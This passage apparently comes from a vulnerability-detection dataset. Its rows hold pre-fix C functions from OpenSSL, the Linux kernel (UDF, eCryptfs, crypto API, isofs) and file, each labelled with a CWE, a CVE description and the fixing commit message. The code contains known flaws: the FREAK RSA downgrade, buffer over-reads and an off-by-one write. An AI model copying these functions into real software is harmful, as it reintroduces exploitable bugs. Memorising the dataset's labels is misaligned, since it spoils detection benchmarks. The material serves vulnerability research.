SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_N_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.N=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (1 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 1;
i = (unsigned int)(p[0]);
p++;
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_S_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.s=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_B_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.B=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!srp_verify_server_param(s, &al))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
/* We must check if there is a certificate */
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
}
else
#endif /* !OPENSSL_NO_SRP */
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if ((rsa=RSA_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_MODULUS_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->n=BN_bin2bn(p,i,rsa->n)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_E_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->e=BN_bin2bn(p,i,rsa->e)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
/* this should be because we are using an export cipher */
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
else
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
s->session->sess_cert->peer_rsa_tmp=rsa;
rsa=NULL;
}
#else /* OPENSSL_NO_RSA */
if (0)
;
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & SSL_kDHE)
{
if ((dh=DH_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_P_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->p=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_PUB_KEY_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->pub_key=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dh), 0, dh))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
/* else anonymous DH, so no certificate or pkey. */
s->session->sess_cert->peer_dh_tmp=dh;
dh=NULL;
}
else if ((alg_k & SSL_kDHr) || (alg_k & SSL_kDHd))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER);
goto f_err;
}
#endif /* !OPENSSL_NO_DH */
#ifndef OPENSSL_NO_ECDH
else if (alg_k & SSL_kECDHE)
{
EC_GROUP *ngroup;
const EC_GROUP *group;
if ((ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Extract elliptic curve parameters and the
* server's ephemeral ECDH public key.
* Keep accumulating lengths of various components in
* param_len and make sure it never exceeds n.
*/
/* XXX: For now we only support named (not generic) curves
* and the ECParameters in this case is just three bytes. We
* also need one byte for the length of the encoded point
*/
param_len=4;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
/* Check curve is one of our preferences, if not server has
* sent an invalid curve. ECParameters is 3 bytes.
*/
if (!tls1_check_curve(s, p, 3))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_CURVE);
goto f_err;
}
if ((curve_nid = tls1_ec_curve_id2nid(*(p + 2))) == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS);
goto f_err;
}
ngroup = EC_GROUP_new_by_curve_name(curve_nid);
if (ngroup == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (EC_KEY_set_group(ecdh, ngroup) == 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
EC_GROUP_free(ngroup);
group = EC_KEY_get0_group(ecdh);
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
al=SSL_AD_EXPORT_RESTRICTION;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto f_err;
}
p+=3;
/* Next, get the encoded ECPoint */
if (((srvr_ecpoint = EC_POINT_new(group)) == NULL) ||
((bn_ctx = BN_CTX_new()) == NULL))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encoded_pt_len = *p; /* length of encoded point */
p+=1;
if ((encoded_pt_len > n - param_len) ||
(EC_POINT_oct2point(group, srvr_ecpoint,
p, encoded_pt_len, bn_ctx) == 0))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_ECPOINT);
goto f_err;
}
param_len += encoded_pt_len;
n-=param_len;
p+=encoded_pt_len;
/* The ECC/TLS specification does not mention
* the use of DSA to sign ECParameters in the server
* key exchange message. We do support RSA and ECDSA.
*/
if (0) ;
#ifndef OPENSSL_NO_RSA
else if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#endif
#ifndef OPENSSL_NO_ECDSA
else if (alg_a & SSL_aECDSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
#endif
/* else anonymous ECDH, so no certificate or pkey. */
EC_KEY_set_public_key(ecdh, srvr_ecpoint);
s->session->sess_cert->peer_ecdh_tmp=ecdh;
ecdh=NULL;
BN_CTX_free(bn_ctx);
bn_ctx = NULL;
EC_POINT_free(srvr_ecpoint);
srvr_ecpoint = NULL;
}
else if (alg_k)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto f_err;
}
#endif /* !OPENSSL_NO_ECDH */
/* p points to the next byte, there are 'n' bytes left */
/* if it was signed, check the signature */
if (pkey != NULL)
{
if (SSL_USE_SIGALGS(s))
{
int rv;
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
goto err;
else if (rv == 0)
{
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
else
md = EVP_sha1();
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
n-=2;
j=EVP_PKEY_size(pkey);
/* Check signature length. If n is 0 then signature is empty */
if ((i != n) || (n > j) || (n <= 0))
{
/* wrong packet length */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_SIGNATURE_LENGTH);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
int num;
unsigned int size;
j=0;
q=md_buf;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,param,param_len);
EVP_DigestFinal_ex(&md_ctx,q,&size);
q+=size;
j+=size;
}
i=RSA_verify(NID_md5_sha1, md_buf, j, p, n,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#endif
{
EVP_VerifyInit_ex(&md_ctx, md, NULL);
EVP_VerifyUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,param,param_len);
if (EVP_VerifyFinal(&md_ctx,p,(int)n,pkey) <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
}
else
{
/* aNULL, aSRP or kPSK do not need public keys */
if (!(alg_a & (SSL_aNULL|SSL_aSRP)) && !(alg_k & SSL_kPSK))
{
/* Might be wrong key type, check it */
if (ssl3_check_cert_and_algorithm(s))
/* Otherwise this shouldn't happen */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
/* still data left over */
if (n != 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_EXTRA_DATA_IN_MESSAGE);
goto f_err;
}
}
EVP_PKEY_free(pkey);
EVP_MD_CTX_cleanup(&md_ctx);
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
EVP_PKEY_free(pkey);
#ifndef OPENSSL_NO_RSA
if (rsa != NULL)
RSA_free(rsa);
#endif
#ifndef OPENSSL_NO_DH
if (dh != NULL)
DH_free(dh);
#endif
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
EC_POINT_free(srvr_ecpoint);
if (ecdh != NULL)
EC_KEY_free(ecdh);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
| 19,329,931,296,243,780,000,000,000,000,000,000,000 | None | null | [
"CWE-310"
] | CVE-2015-0204 | The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. | https://nvd.nist.gov/vuln/detail/CVE-2015-0204 |
1,593 | linux | e237ec37ec154564f8690c5bd1795339955eeef9 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/e237ec37ec154564f8690c5bd1795339955eeef9 | udf: Check component length before reading it
Check that length specified in a component of a symlink fits in the
input buffer we are reading. Also properly ignore component length for
component types that do not use it. Otherwise we read memory after end
of buffer for corrupted udf image.
Reported-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | static int udf_pc_to_char(struct super_block *sb, unsigned char *from,
int fromlen, unsigned char *to, int tolen)
{
struct pathComponent *pc;
int elen = 0;
int comp_len;
unsigned char *p = to;
/* Reserve one byte for terminating \0 */
tolen--;
while (elen < fromlen) {
pc = (struct pathComponent *)(from + elen);
switch (pc->componentType) {
case 1:
/*
* Symlink points to some place which should be agreed
* upon between originator and receiver of the media. Ignore.
*/
if (pc->lengthComponentIdent > 0)
break;
/* Fall through */
case 2:
if (tolen == 0)
return -ENAMETOOLONG;
p = to;
*p++ = '/';
tolen--;
break;
case 3:
if (tolen < 3)
return -ENAMETOOLONG;
memcpy(p, "../", 3);
p += 3;
tolen -= 3;
break;
case 4:
if (tolen < 2)
return -ENAMETOOLONG;
memcpy(p, "./", 2);
p += 2;
tolen -= 2;
/* that would be . - just ignore */
break;
case 5:
comp_len = udf_get_filename(sb, pc->componentIdent,
pc->lengthComponentIdent,
p, tolen);
p += comp_len;
tolen -= comp_len;
if (tolen == 0)
return -ENAMETOOLONG;
*p++ = '/';
tolen--;
break;
}
elen += sizeof(struct pathComponent) + pc->lengthComponentIdent;
}
if (p > to + 1)
p[-1] = '\0';
else
p[0] = '\0';
return 0;
}
| 325,864,361,331,960,330,000,000,000,000,000,000,000 | symlink.c | 76,715,452,543,384,660,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2014-9730 | The udf_pc_to_char function in fs/udf/symlink.c in the Linux kernel before 3.18.2 relies on component lengths that are unused, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image. | https://nvd.nist.gov/vuln/detail/CVE-2014-9730 |
1,596 | linux | 942080643bce061c3dd9d5718d3b745dcb39a8bc | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/942080643bce061c3dd9d5718d3b745dcb39a8bc | eCryptfs: Remove buggy and unnecessary write in file name decode routine
Dmitry Chernenkov used KASAN to discover that eCryptfs writes past the
end of the allocated buffer during encrypted filename decoding. This
fix corrects the issue by getting rid of the unnecessary 0 write when
the current bit offset is 2.
Signed-off-by: Michael Halcrow <mhalcrow@google.com>
Reported-by: Dmitry Chernenkov <dmitryc@google.com>
Suggested-by: Kees Cook <keescook@chromium.org>
Cc: stable@vger.kernel.org # v2.6.29+: 51ca58d eCryptfs: Filename Encryption: Encoding and encryption functions
Signed-off-by: Tyler Hicks <tyhicks@canonical.com> | 1 | ecryptfs_decode_from_filename(unsigned char *dst, size_t *dst_size,
const unsigned char *src, size_t src_size)
{
u8 current_bit_offset = 0;
size_t src_byte_offset = 0;
size_t dst_byte_offset = 0;
if (dst == NULL) {
(*dst_size) = ecryptfs_max_decoded_size(src_size);
goto out;
}
while (src_byte_offset < src_size) {
unsigned char src_byte =
filename_rev_map[(int)src[src_byte_offset]];
switch (current_bit_offset) {
case 0:
dst[dst_byte_offset] = (src_byte << 2);
current_bit_offset = 6;
break;
case 6:
dst[dst_byte_offset++] |= (src_byte >> 4);
dst[dst_byte_offset] = ((src_byte & 0xF)
<< 4);
current_bit_offset = 4;
break;
case 4:
dst[dst_byte_offset++] |= (src_byte >> 2);
dst[dst_byte_offset] = (src_byte << 6);
current_bit_offset = 2;
break;
case 2:
dst[dst_byte_offset++] |= (src_byte);
dst[dst_byte_offset] = 0;
current_bit_offset = 0;
break;
}
src_byte_offset++;
}
(*dst_size) = dst_byte_offset;
out:
return;
}
| 288,062,041,952,122,140,000,000,000,000,000,000,000 | crypto.c | 83,043,817,776,762,890,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2014-9683 | Off-by-one error in the ecryptfs_decode_from_filename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted filename. | https://nvd.nist.gov/vuln/detail/CVE-2014-9683 |
1,600 | linux | 4943ba16bbc2db05115707b3ff7b4874e9e3c560 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4943ba16bbc2db05115707b3ff7b4874e9e3c560 | crypto: include crypto- module prefix in template
This adds the module loading prefix "crypto-" to the template lookup
as well.
For example, attempting to load 'vfat(blowfish)' via AF_ALG now correctly
includes the "crypto-" prefix at every level, correctly rejecting "vfat":
net-pf-38
algif-hash
crypto-vfat(blowfish)
crypto-vfat(blowfish)-all
crypto-vfat
Reported-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Kees Cook <keescook@chromium.org>
Acked-by: Mathias Krause <minipli@googlemail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au> | 1 | struct crypto_template *crypto_lookup_template(const char *name)
{
return try_then_request_module(__crypto_lookup_template(name), "%s",
name);
}
| 116,020,862,207,451,470,000,000,000,000,000,000,000 | algapi.c | 187,872,088,690,328,180,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2014-9644 | The Crypto API in the Linux kernel before 3.18.5 allows local users to load arbitrary kernel modules via a bind system call for an AF_ALG socket with a parenthesized module template expression in the salg_name field, as demonstrated by the vfat(aes) expression, a different vulnerability than CVE-2013-7421. | https://nvd.nist.gov/vuln/detail/CVE-2014-9644 |
1,601 | file | 65437cee25199dbd385fb35901bc0011e164276c | https://github.com/file/file | https://github.com/file/file/commit/65437cee25199dbd385fb35901bc0011e164276c | Limit string printing to 100 chars, and add flags I forgot in the previous
commit. | 1 | donote(struct magic_set *ms, void *vbuf, size_t offset, size_t size,
int clazz, int swap, size_t align, int *flags, uint16_t *notecount)
{
Elf32_Nhdr nh32;
Elf64_Nhdr nh64;
size_t noff, doff;
uint32_t namesz, descsz;
unsigned char *nbuf = CAST(unsigned char *, vbuf);
if (*notecount == 0)
return 0;
--*notecount;
if (xnh_sizeof + offset > size) {
/*
* We're out of note headers.
*/
return xnh_sizeof + offset;
}
(void)memcpy(xnh_addr, &nbuf[offset], xnh_sizeof);
offset += xnh_sizeof;
namesz = xnh_namesz;
descsz = xnh_descsz;
if ((namesz == 0) && (descsz == 0)) {
/*
* We're out of note headers.
*/
return (offset >= size) ? offset : size;
}
if (namesz & 0x80000000) {
(void)file_printf(ms, ", bad note name size 0x%lx",
(unsigned long)namesz);
return 0;
}
if (descsz & 0x80000000) {
(void)file_printf(ms, ", bad note description size 0x%lx",
(unsigned long)descsz);
return 0;
}
noff = offset;
doff = ELF_ALIGN(offset + namesz);
if (offset + namesz > size) {
/*
* We're past the end of the buffer.
*/
return doff;
}
offset = ELF_ALIGN(doff + descsz);
if (doff + descsz > size) {
/*
* We're past the end of the buffer.
*/
return (offset >= size) ? offset : size;
}
if ((*flags & FLAGS_DID_OS_NOTE) == 0) {
if (do_os_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_BUILD_ID) == 0) {
if (do_bid_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_NETBSD_PAX) == 0) {
if (do_pax_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags))
return size;
}
if ((*flags & FLAGS_DID_CORE) == 0) {
if (do_core_note(ms, nbuf, xnh_type, swap,
namesz, descsz, noff, doff, flags, size, clazz))
return size;
}
if (namesz == 7 && strcmp((char *)&nbuf[noff], "NetBSD") == 0) {
switch (xnh_type) {
case NT_NETBSD_VERSION:
return size;
case NT_NETBSD_MARCH:
if (*flags & FLAGS_DID_NETBSD_MARCH)
return size;
if (file_printf(ms, ", compiled for: %.*s", (int)descsz,
(const char *)&nbuf[doff]) == -1)
return size;
break;
case NT_NETBSD_CMODEL:
if (*flags & FLAGS_DID_NETBSD_CMODEL)
return size;
if (file_printf(ms, ", compiler model: %.*s",
(int)descsz, (const char *)&nbuf[doff]) == -1)
return size;
break;
default:
if (*flags & FLAGS_DID_NETBSD_UNKNOWN)
return size;
if (file_printf(ms, ", note=%u", xnh_type) == -1)
return size;
break;
}
return size;
}
return offset;
}
| 206,842,038,504,383,380,000,000,000,000,000,000,000 | readelf.c | 196,087,564,373,822,200,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2014-9621 | The ELF parser in file 5.16 through 5.21 allows remote attackers to cause a denial of service via a long string. | https://nvd.nist.gov/vuln/detail/CVE-2014-9621 |
1,611 | linux | 4e2024624e678f0ebb916e6192bd23c1f9fdf696 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4e2024624e678f0ebb916e6192bd23c1f9fdf696 | isofs: Fix unchecked printing of ER records
We didn't check length of rock ridge ER records before printing them.
Thus corrupted isofs image can cause us to access and print some memory
behind the buffer with obvious consequences.
Reported-and-tested-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | parse_rock_ridge_inode_internal(struct iso_directory_record *de,
struct inode *inode, int flags)
{
int symlink_len = 0;
int cnt, sig;
unsigned int reloc_block;
struct inode *reloc;
struct rock_ridge *rr;
int rootflag;
struct rock_state rs;
int ret = 0;
if (!ISOFS_SB(inode->i_sb)->s_rock)
return 0;
init_rock_state(&rs, inode);
setup_rock_ridge(de, inode, &rs);
if (flags & RR_REGARD_XA) {
rs.chr += 14;
rs.len -= 14;
if (rs.len < 0)
rs.len = 0;
}
repeat:
while (rs.len > 2) { /* There may be one byte for padding somewhere */
rr = (struct rock_ridge *)rs.chr;
/*
* Ignore rock ridge info if rr->len is out of range, but
* don't return -EIO because that would make the file
* invisible.
*/
if (rr->len < 3)
goto out; /* Something got screwed up here */
sig = isonum_721(rs.chr);
if (rock_check_overflow(&rs, sig))
goto eio;
rs.chr += rr->len;
rs.len -= rr->len;
/*
* As above, just ignore the rock ridge info if rr->len
* is bogus.
*/
if (rs.len < 0)
goto out; /* Something got screwed up here */
switch (sig) {
#ifndef CONFIG_ZISOFS /* No flag for SF or ZF */
case SIG('R', 'R'):
if ((rr->u.RR.flags[0] &
(RR_PX | RR_TF | RR_SL | RR_CL)) == 0)
goto out;
break;
#endif
case SIG('S', 'P'):
if (check_sp(rr, inode))
goto out;
break;
case SIG('C', 'E'):
rs.cont_extent = isonum_733(rr->u.CE.extent);
rs.cont_offset = isonum_733(rr->u.CE.offset);
rs.cont_size = isonum_733(rr->u.CE.size);
break;
case SIG('E', 'R'):
ISOFS_SB(inode->i_sb)->s_rock = 1;
printk(KERN_DEBUG "ISO 9660 Extensions: ");
{
int p;
for (p = 0; p < rr->u.ER.len_id; p++)
printk("%c", rr->u.ER.data[p]);
}
printk("\n");
break;
case SIG('P', 'X'):
inode->i_mode = isonum_733(rr->u.PX.mode);
set_nlink(inode, isonum_733(rr->u.PX.n_links));
i_uid_write(inode, isonum_733(rr->u.PX.uid));
i_gid_write(inode, isonum_733(rr->u.PX.gid));
break;
case SIG('P', 'N'):
{
int high, low;
high = isonum_733(rr->u.PN.dev_high);
low = isonum_733(rr->u.PN.dev_low);
/*
* The Rock Ridge standard specifies that if
* sizeof(dev_t) <= 4, then the high field is
* unused, and the device number is completely
* stored in the low field. Some writers may
* ignore this subtlety,
* and as a result we test to see if the entire
* device number is
* stored in the low field, and use that.
*/
if ((low & ~0xff) && high == 0) {
inode->i_rdev =
MKDEV(low >> 8, low & 0xff);
} else {
inode->i_rdev =
MKDEV(high, low);
}
}
break;
case SIG('T', 'F'):
/*
* Some RRIP writers incorrectly place ctime in the
* TF_CREATE field. Try to handle this correctly for
* either case.
*/
/* Rock ridge never appears on a High Sierra disk */
cnt = 0;
if (rr->u.TF.flags & TF_CREATE) {
inode->i_ctime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_ctime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_MODIFY) {
inode->i_mtime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_mtime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_ACCESS) {
inode->i_atime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_atime.tv_nsec = 0;
}
if (rr->u.TF.flags & TF_ATTRIBUTES) {
inode->i_ctime.tv_sec =
iso_date(rr->u.TF.times[cnt++].time,
0);
inode->i_ctime.tv_nsec = 0;
}
break;
case SIG('S', 'L'):
{
int slen;
struct SL_component *slp;
struct SL_component *oldslp;
slen = rr->len - 5;
slp = &rr->u.SL.link;
inode->i_size = symlink_len;
while (slen > 1) {
rootflag = 0;
switch (slp->flags & ~1) {
case 0:
inode->i_size +=
slp->len;
break;
case 2:
inode->i_size += 1;
break;
case 4:
inode->i_size += 2;
break;
case 8:
rootflag = 1;
inode->i_size += 1;
break;
default:
printk("Symlink component flag "
"not implemented\n");
}
slen -= slp->len + 2;
oldslp = slp;
slp = (struct SL_component *)
(((char *)slp) + slp->len + 2);
if (slen < 2) {
if (((rr->u.SL.
flags & 1) != 0)
&&
((oldslp->
flags & 1) == 0))
inode->i_size +=
1;
break;
}
/*
* If this component record isn't
* continued, then append a '/'.
*/
if (!rootflag
&& (oldslp->flags & 1) == 0)
inode->i_size += 1;
}
}
symlink_len = inode->i_size;
break;
case SIG('R', 'E'):
printk(KERN_WARNING "Attempt to read inode for "
"relocated directory\n");
goto out;
case SIG('C', 'L'):
if (flags & RR_RELOC_DE) {
printk(KERN_ERR
"ISOFS: Recursive directory relocation "
"is not supported\n");
goto eio;
}
reloc_block = isonum_733(rr->u.CL.location);
if (reloc_block == ISOFS_I(inode)->i_iget5_block &&
ISOFS_I(inode)->i_iget5_offset == 0) {
printk(KERN_ERR
